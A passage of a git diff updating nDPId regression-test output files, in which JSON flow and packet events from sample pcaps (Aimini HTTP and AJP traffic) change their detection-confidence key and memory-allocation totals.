{"4":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"},"http": {"hostname":"www.aimini.net","url":"www.aimini.net\/member\/signup\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko\/20110420 Firefox\/3.6.17"}} +00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229383,"flow_last_seen":1614860229384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":595,"flow_tot_l4_payload_len":595,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1614860229384,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"},"http": {"hostname":"www.aimini.net","url":"www.aimini.net\/member\/signup\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko\/20110420 Firefox\/3.6.17"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229385,"flow_last_seen":1614860229385,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229385,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614860229385,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229385,"pkt":"5kBKB+riApXG95NLCABFAAAwBP8AAIAGAAAKZQACCmYAAm9WAFCbu7tlAAAAAHACgAEU8QAAAgQFtAMDAQA="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614860229386,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229386,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBP8AAH8GIfsKZQACCmYAAm9WAFCbu7tlAAAAAHACgAEoiAAAAgQFtAMDAQA="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614860229386,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229386,"pkt":"WgXZu6TVApXG95WRCABFAAAwBQ0AAIAGAAAKZgACCmUAAgBQb1abu8Cxm7u7ZnASgAEU8QAAAgQFtAMDAQA="} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229385,"flow_last_seen":1614860229386,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":524,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1614860229386,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"},"http": {"hostname":"www.aimini.com","url":"www.aimini.com\/webcounter\/w.php?___hm=.net_SignUp_&_lh_=http:\/\/www.aimini.net\/member\/signup\/&__Refer_=http:\/\/www.aimini.net\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko\/20110420 Firefox\/3.6.17"}} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229385,"flow_last_seen":1614860229386,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":524,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1614860229386,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"},"http": {"hostname":"www.aimini.com","url":"www.aimini.com\/webcounter\/w.php?___hm=.net_SignUp_&_lh_=http:\/\/www.aimini.net\/member\/signup\/&__Refer_=http:\/\/www.aimini.net\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko\/20110420 Firefox\/3.6.17"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229388,"flow_last_seen":1614860229388,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229388,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614860229388,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229388,"pkt":"5kBKB+riApXG95NLCABFAAAwBREAAIAGAAAKZQACCmYAAm9XAFCbu+drAAAAAHACgAEU8QAAAgQFtAMDAQA="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614860229389,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBREAAH8GIekKZQACCmYAAm9XAFCbu+drAAAAAHACgAH8gAAAAgQFtAMDAQA="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614860229389,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"WgXZu6TVApXG95WRCABFAAAwBRkAAIAGAAAKZgACCmUAAgBQb1ebu+vKm7vnbHASgAEU8QAAAgQFtAMDAQA="} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229388,"flow_last_seen":1614860229389,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1614860229389,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"},"http": {"hostname":"www.aimini.net","url":"www.aimini.net\/search\/?q=pictures&sca=","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko\/20110420 Firefox\/3.6.17"}} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229388,"flow_last_seen":1614860229389,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1614860229389,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"},"http": {"hostname":"www.aimini.net","url":"www.aimini.net\/search\/?q=pictures&sca=","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko\/20110420 Firefox\/3.6.17"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614860229389,"flow_last_seen":1614860229389,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614860229389,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1614860229389,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229389,"pkt":"5kBKB+riApXG95NLCABFAAAwBRcAAIAGAAAKZQACCmYAAm9YAFCbu\/hqAAAAAHACgAEU8QAAAgQFtAMDAQA="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1614860229390,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229390,"pkt":"ApXG95WRWgXZu6TVCABFAAAwBRcAAH8GIeMKZQACCmYAAm9YAFCbu\/hqAAAAAHACgAHrgAAAAgQFtAMDAQA="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1614860229390,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614860229390,"pkt":"WgXZu6TVApXG95WRCABFAAAwBSIAAIAGAAAKZgACCmUAAgBQb1ibu\/tYm7v4a3ASgAEU8QAAAgQFtAMDAQA="} -00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":542,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"},"http": {"hostname":"www.aimini.com","url":"www.aimini.com\/webcounter\/w.php?___hm=.net_Search_&_lh_=http:\/\/www.aimini.net\/search\/?q=pictures&sca=&__Refer_=http:\/\/www.aimini.net\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko\/20110420 Firefox\/3.6.17"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1614860229383,"flow_last_seen":1614860229388,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60714,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"}} -00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1614860229385,"flow_last_seen":1614860229388,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":3194,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"}} 
-00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1614860229388,"flow_last_seen":1614860229390,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13568,"flow_avg_l4_payload_len":452,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"}} -00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"}} +00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":542,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"},"http": {"hostname":"www.aimini.com","url":"www.aimini.com\/webcounter\/w.php?___hm=.net_Search_&_lh_=http:\/\/www.aimini.net\/search\/?q=pictures&sca=&__Refer_=http:\/\/www.aimini.net\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko\/20110420 Firefox\/3.6.17"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1614860229383,"flow_last_seen":1614860229388,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":60714,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"}} +00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1614860229385,"flow_last_seen":1614860229388,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":3194,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"}} 
+00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1614860229388,"flow_last_seen":1614860229390,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13568,"flow_avg_l4_payload_len":452,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"}} +00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1614860229389,"flow_last_seen":1614860229390,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":542,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1614860229390,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":28504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Aimini","breed":"Fun","category":"Download"}} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":139,"source":"aimini-http.pcap","alias":"nDPId-test","packets-captured":139,"packets-processed":133,"total-skipped-flows":0,"total-l4-payload-len":79130,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1614860229390} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ 
packets captured/processed: 139/133 @@ -33,9 +33,9 @@ ~~ total active/idle flows...: 4/4 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5877316 bytes -~~ total memory freed........: 5877316 bytes -~~ total allocations/frees...: 118275/118275 +~~ total memory allocated....: 6010950 bytes +~~ total memory freed........: 6010950 bytes +~~ total allocations/frees...: 121037/121037 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 467 chars ~~ json string max len.......: 970 chars diff --git a/test/results/ajp.pcap.out b/test/results/ajp.pcap.out index 32068be12..e97d4bf74 100644 --- a/test/results/ajp.pcap.out +++ b/test/results/ajp.pcap.out 
@@ -6,7 +6,7 @@ 00197{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584447} 00392{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584447,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADwAAEAAQAbPXKwdCZOsHQmSH0mXyJOgLrhyxdswoBI4kBXsAAACBAW0BAIICh5X79hOnGnnAQMDBw=="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1505154584447,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1505154584447,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAANLLJQABABhybrB0JkqwdCZOXyB9JcsXbMJOgLrmAEABzfNQAAAEBCApOnGnoHlfv2A=="} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584447,"flow_last_seen":1505154584447,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584447,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ajp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584447,"flow_last_seen":1505154584447,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584447,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 00197{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584447} 00392{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584447,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAADyyyEAAQAYclKwdCZKsHQmTl8gfSXLF2y8AAAAAoAI5COYNAAACBAW0BAIICk6caecAAAAAAQMDBw=="} 00197{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":8,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584447} 
@@ -23,7 +23,7 @@ 00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":22,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584618} 00393{"packet_event_id":1,"packet_event_name":"packet","packet_id":22,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq9AAAAAgq8AAAAiQNAIABQVoNdWABQVoOO84EAAAcIAEUAADwAAEAAQAbPXKwdCZOsHQmSH0mXyJOgLrhyxdswoBI4kBXsAAACBAW0BAIICh5X79hOnGnnAQMDBw=="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1505154584618,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1505154584618,"pkt":"AFBWg47zAFBWg11YgQAABwgARQAANLLJQABABhybrB0JkqwdCZOXyB9KcsXbMJOgLrmAEABzfNMAAAEBCApOnGnoHlfv2A=="} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ajp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1505154584618,"flow_last_seen":1505154584618,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1505154584618,"l3_proto":"ip4","src_ip":"172.29.9.146","dst_ip":"172.29.9.147","src_port":38856,"dst_port":8010,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"AJP","breed":"Acceptable","category":"Web"}} 00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":25,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":1505154584618} 00393{"packet_event_id":1,"packet_event_name":"packet","packet_id":25,"source":"ajp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":1505154584618,"pkt":"Agq8AAAAAgq9AAAAiQNAIABQVoOO8wBQVoNdWIEAAAcIAEUAADyyyEAAQAYclKwdCZKsHQmTl8gfSXLF2y8AAAAAoAI5COYNAAACBAW0BAIICk6caecAAAAAAQMDBw=="} 00198{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":27,"source":"ajp.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1505154584618} 
